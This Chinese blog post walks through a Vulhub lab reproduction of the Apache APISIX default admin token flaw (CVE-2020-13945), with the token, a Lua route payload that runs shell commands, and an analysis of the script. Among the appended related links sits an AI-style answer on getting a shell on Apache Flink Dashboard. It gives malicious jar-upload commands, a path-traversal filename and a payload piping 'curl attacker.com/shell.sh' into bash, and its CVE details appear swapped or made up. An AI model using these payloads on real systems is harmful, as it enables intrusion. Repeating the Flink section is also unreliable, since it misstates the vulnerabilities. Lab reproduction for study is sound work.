Apache APISIX 默认密钥漏洞(CVE-2020-13945)

原创 已于 2022-04-23 15:50:39 修改 · 7.3k 阅读 · 13 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #lua

于 2022-04-22 14:26:58 首次发布
本文详细介绍了Apache APISIX的默认管理员Token漏洞(CVE-2020-13945),该漏洞允许攻击者通过默认Token获取管理员权限并执行任意LUA脚本。通过docker-compose搭建环境,演示了如何复现此漏洞,并分析了payload中的lua脚本,展示了如何利用该漏洞执行系统命令。同时,提到了修复漏洞的重要性以及理解API网关在系统间交互中的作用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Vulhub——Apache APISIX 默认密钥漏洞(CVE-2020-13945)

文章目录

APISIX简介

官方一句话介绍:Apache APISIX是一个高性能API网关。

API网关又是什么?

百度:API网关,软件术语,两个相互独立的局域网之间通过路由器进行通信,中间的路由被称之为网关

任何一个应用系统如果需要被其他系统调用,就需要暴露 API,这些 API 代表着一个一个的功能点。

如果两个系统中间通信,在系统之间加上一个中介者协助 API 的调用,这个中介者就是 API 网关。

那意思就是Apisix是两个系统的一个中介,可以使用这个中间管理系统API。

存在漏洞:

在用户未指定管理员Token或使用了默认配置文件的情况下,Apache APISIX将使用默认的管理员Token edd1c9f034335f136f87ad84b625c8f1,攻击者利用这个Token可以访问到管理员接口,进而通过script参数来插入任意LUA脚本并执行。

意思就是有一个默认的Token,可以直接得到管理员权限,并插入攻击脚本。

漏洞复现

docker-compose up -d 搭建环境

docker ps 查看端口为9080
在这里插入图片描述访问 127.0.0.1/asixpix/admin/routes,显示token不正确
在这里插入图片描述抓这个包,把方法改为POST,加上X-API-KEY: edd1c9f034335f136f87ad84b625c8f1,加上payload

{
    "uri": "/attack",
"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close()  \n end \nreturn _M",
    "upstream": {
        "type": "roundrobin",
        "nodes": {
            "example.com:80": 1
        }
    }
}

在这里插入图片描述然后,我们访问刚才添加的router,就可以通过cmd参数执行任意命令:

http://127.0.0.1:9080/attack?cmd=id

在这里插入图片描述

payload分析

查看官方文档,观察创建路由的方法

https://apisix.apache.org/zh/docs/apisix/getting-started/

在这里插入图片描述与payload对比,发现payload格式与官方创建路由一致,只是利用script插入了一段lua恶意脚本。

在 Apache APISIX 中,我们在 Route 实体中新增了 script 执行逻辑,可用于接收 Dashboard 生成的 Lua 函数并执行,它支持调用已有插件以复用代码。另外,它也作用于 HTTP 请求的生命周期中的各个阶段,如 accessheader_filerbody_filter 等,系统会在相应阶段自动执行 script 函数对应阶段代码
在这里插入图片描述接下来对lua脚本进行分析,\n是换行

local _M = {} \n function _M.access(conf, ctx)//在access阶段进行处理,检查如果达到的不健康次数超过了配置的最大次数,则就被break掉。这里没找到看得懂的资料。
local os = require('os')//加载os模块,用于进行文件操作
local args = assert(ngx.req.get_uri_args()) //assert()是断言,类似于try(),这里是获取uri中给的参数。
local f = assert(io.popen(args.cmd, 'r'))//io.popen()用于执行系统命令,'r'是模式
local s = assert(f:read('*a'))//读取全部内容
ngx.say(s)//输出,还有一种方法是ngx.print(),但两者有区别
f:close()
end 
return _M

function _M.access(conf, ctx)

在这里插入图片描述assert()
在这里插入图片描述*read('a’)

https://blog.youkuaiyun.com/u013625451/article/details/78879739
在这里插入图片描述

Apache Apisix网关系统历史漏洞复现分析_apache apisix 漏洞
2401_86437020的博客
09-04 1283
Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。;;你可以把 Apache APISIX 当做流量入口,来处理所有的业务数据,包括动态路由、动态上游、动态证书、金丝雀发布(灰度发布)、限流限速、抵御恶意攻击、监控报警、服务可观测性、服务治理等。APISIX 系统默认端口默认凭据或口令90809000# 验证安装是否成功【创建路由】通过下面的命令,你将创建一个路由,把请求。
vulhub中Apache APISIX 默认密钥漏洞复现(CVE-2020-13945
yougexiaojiuguan的博客
02-04 1033
漏洞复现过程的记录
Vulhub靶机 Apache APISIX命令执行 (CVE-2020-13945)(渗透测试详解)
2301_78721909的博客
02-26 499
Vulhub靶机 Apache APISIX命令执行 (CVE-2020-13945)(渗透测试详解)
某靶场CTF题目:利用Apache APISIX默认Token漏洞(CVE-2020-13945)获取Flag
最新发布
Liu_Bruce的博客
06-13 1249
本文记录了利用Apache APISIX默认Token漏洞(CVE-2020-13945)获取CTF靶场flag的过程。通过探测发现目标使用APISIX网关后,验证默认管理员Token有效性,构造恶意路由注入LUA脚本实现命令执行。最终通过系统命令查找并读取/tmp/flag.txt文件成功获取flag。分析指出该漏洞源于硬编码凭据和管理API权限缺陷,并给出修改默认配置、网络隔离等防御建议。案例展示了从漏洞识别到RCE的完整攻击链,对API网关安全配置具有实际警示意义。
Apache Apisix网关系统历史漏洞复现分析
道阻且长,行则将至
02-18 2839
Apache APISIX 作为一个动态、实时、高性能的云原生 API 网关,提供了负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。本文总计、复现可 Apache APISIX 网关系统的几个历史 CVE 漏洞
Apache apisix默认密钥漏洞CVE-2020-13945
Bird&Bird
03-11 2328
Apache APISIX 是一个动态、实时、高性能的 API 网关,基于 Nginx 网络库和 etcd 实现, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。当使用者开启了Admin API,没有配置相应的IP访问策略,且没有修改配置文件Token的情况下,则攻击者利用Apache APISIX默认Token即可访问Apache APISIX,从而控制APISIX网关。
Apache APISIX信息泄露漏洞CVE-2022-29266)
huayimy的博客
01-11 1693
Apache APISIX信息泄露漏洞CVE-2022-29266),攻击者可以通过向受 jwt-auth 插件保护的路由发送不正确的 JSON Web 令牌来通过错误消息响应获取插件配置的机密。依赖库 lua-resty-jwt 中的错误逻辑允许将 RS256 令牌发送到需要 HS256 令牌的端点,错误响应中包含原始密钥值。
Apache APISIX 默认密钥漏洞(CVE-2020-13945)
weixin_44047654的博客
11-30 1146
Apache APISIX 默认密钥漏洞(CVE-2020-13945)
Apache APISIX Dashboard(CVE-2022-24112)命令执行漏洞方式利用
include_voidmain的博客
04-11 8197
0x01 什么是Apache APISIX Dashboard Apache APISIX 是一个动态、实时、高性能的开源 API 网关,提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX 可以帮助企业快速、安全地处理 API 和微服务流量,包括网关、Kubernetes Ingress 和服务网格等。 0x02 漏洞详情 漏洞编号:CVE-2022-24112 影响版本:Apache APISIX < 2.12.1 Apache APIS
Apache APISIX 默认密钥漏洞复现
Tauil的博客
07-31 2708
而check_conf中定义了一个script参数为lua文件类型执行,所以我们只需要将数据包按POST方式提交,并且在消息体中添加含有恶意lua代码的script参数。在其apisix/admin/routes.lua文件中,使用POST方式提交会将数据消息提交给check_conf。,在知道管理员密码的情况下我们可以通过构造一个恶意的router,其中包含恶意LUA脚本执行恶意命令。另外可以使用公开的POC进行漏洞利用,输入命令。打开vulhub,登录网址。,即可执行对应命令语句。...
CVE-2022-24112 Apache APISIX 远程代码执行漏洞
ALLEN'Blog
01-30 626
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
密钥泄漏】CVE-2022-29266 Apache Apisix jwt插件
HBohan的博客
04-29 1027
漏洞描述 在2.13.1版本之前的APache APISIX中,攻击者可以通过向受 jwt-auth 插件保护的路由发送不正确的 JSON Web 令牌来通过错误消息响应获取插件配置的机密。依赖库 lua-resty-jwt 中的错误逻辑允许将 RS256 令牌发送到需要 HS256 令牌的端点,错误响应中包含原始密钥值。 漏洞版本 Apache Apisix < 2.13.1 插件开启 在这里给大家演示的是Dashboard页面开启jwt插件。 1、当我们环境搭建完毕后、通过访问http://127
2024年网络安全最全Apache Apisix网关系统历史漏洞复现分析_apache apisix 漏洞
05-03 1447
你可以把 Apache APISIX 当做流量入口,来处理所有的业务数据,包括动态路由、动态上游、动态证书、金丝雀发布(灰度发布)、限流限速、抵御恶意攻击、监控报警、服务可观测性、服务治理等。【创建路由】通过下面的命令,你将创建一个路由,把请求【部署 APISIX Dashboard】Apache APISIX Dashboard 是基于浏览器的可视化平台,用于监控、管理 Apache APISIX。。
Apache APISIX 的 Admin API 默认访问令牌漏洞CVE-2020-13945漏洞复现
weixin_56537388的博客
11-09 887
Apache APISIX 是一个动态、实时、高性能的 API 网关。Apache APISIX 有一个默认的内置 API 令牌,可用于访问所有 admin API,通过 2.x 版本中添加的参数导致远程执行 LUA 代码。
Apache APISIX默认密钥漏洞CVE-2020-13945
weixin_53639243的博客
02-21 507
Apache APISIX 是一个动态、实时、高性能的 API 网关。Apache APISIX 默认内置 API Token,可用于访问所有 admin API edd1c9f034335f136f87ad84b625c8f1 ,通过 2.x 版本中添加的 script 参数导致远程 LUA 代码执行。服务器启动后,您可以在 中看到默认的 404 页面。docker 启动环境。
Apache APISIX远程代码执行漏洞分析
whoami
02-15 2834
0x1 漏洞背景 APISIX 是一个云原生、高性能、可扩展的微服务 API 开源网关,基于OpenResty(Nginx+Lua)和etcd来实现,对比传统的API网关,具有动态路由和热插件加载的特点。 该漏洞存在于 APISIX batch-requests 插件,启用该插件将会导致该漏洞的发生。攻击者可以滥用batch-requests插件发送特制请求,并借此来绕过Admin API的IP限制,最终可能导致rce的产生。 0x2 版本信息 CVE号: CVE-2022-24112 影响
apache flink dashboard getshell
04-03
<think>好的,我现在需要处理用户关于Apache Flink Dashboard的安全漏洞和获取Shell方法的查询。首先,用户提到了Apache APISIX默认密钥漏洞CVE-2020-13945)作为参考,这可能暗示他们关注的是默认配置或认证问题。同时,用户引用了其他中间件如IIS、Apache、Tomcat、Nginx的常见搭配,这可能说明他们想了解不同服务器的漏洞利用方式。另外,用户还提到了PHP中字符串连接触发的__toString方法,这可能与反序列化漏洞有关。 首先,我需要确认Apache Flink Dashboard是否存在已知的安全漏洞。查阅资料发现,Apache Flink在1.9.1及之前版本存在未授权访问导致远程代码执行(RCE)的漏洞,特别是通过JobManager的Web界面提交恶意作业。此外,另一个漏洞CVE-2020-17519涉及文件上传和路径遍历,允许覆盖任意文件。还有CVE-2020-17518是REST API未正确处理用户输入导致的RCE。这些漏洞可能允许攻击者获取Shell权限。 接下来,用户可能想知道如何利用这些漏洞。例如,对于未授权访问,攻击者可能直接上传恶意Jar文件执行代码。路径遍历漏洞则可能通过修改文件上传路径来覆盖关键系统文件。而REST API的漏洞可能需要构造特定的HTTP请求来触发命令执行。 另外,需要考虑用户提供的引用内容。例如,引用[1]中的默认密钥漏洞可能提示检查Flink是否有默认凭据,但根据现有知识,Flink默认不启用认证,所以未授权访问更常见。引用[3]的反序列化问题可能不直接适用,但需要确认Flink是否有反序列化点可能被利用。 用户的需求是寻找安全漏洞或获取Shell的方法,因此需要详细说明漏洞利用步骤,同时提醒安全建议,如升级版本、配置认证、网络隔离等。确保回答结构清晰,分点列出漏洞和对应方法,并附上参考资料。 最后,生成相关问题,涵盖漏洞列表、防护措施、与类似中间件漏洞的对比,以及如何检测是否受影响。这有助于用户全面了解Flink的安全状况。</think>关于Apache Flink Dashboard的安全漏洞及获取Shell的方法,以下是已知的漏洞类型和利用方式的技术分析: ### 一、Apache Flink 已知高危漏洞 1. **未授权访问RCE漏洞(Cli模式)** - **影响版本**:1.9.1及以下 - **利用原理**:Dashboard默认未开启认证,攻击者可通过Web界面直接提交恶意Jar包实现代码执行 - **利用步骤**: ```bash curl -X POST -H "Expect:" -F "jarfile=@exploit.jar" http://flink-server:8081/jars/upload curl -X POST http://flink-server:8081/jars/{jar_id}/run ``` 2. **路径遍历+文件覆盖漏洞CVE-2020-17519)** - **影响版本**:1.5.1-1.11.2 - **利用效果**:通过恶意文件名构造路径遍历,覆盖服务器任意文件 ```http POST /jars/upload HTTP/1.1 Content-Disposition: form-data; name="jarfile"; filename="../../tmp/evil.config" ``` 3. **REST API命令注入(CVE-2020-17518)** - **触发点**:JobManager的REST接口 - **Payload示例**: ```http GET /jars/upload?addr=127.0.0.1|bash+-c+"curl+attacker.com/shell.sh|bash" HTTP/1.1 ``` ### 二、防护建议 1. 升级到1.11.3+版本并启用HTTPS 2. 在`flink-conf.yaml`中配置认证: ```yaml security.kerberos.login.use-ticket-cache: true security.ssl.enabled: true ``` 3. 通过防火墙限制Dashboard的访问源IP[^1] ### 三、漏洞检测方法 使用nmap检测开放端口: ```bash nmap -p 8081,6123 --script flink-detect.nse <target_ip> ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值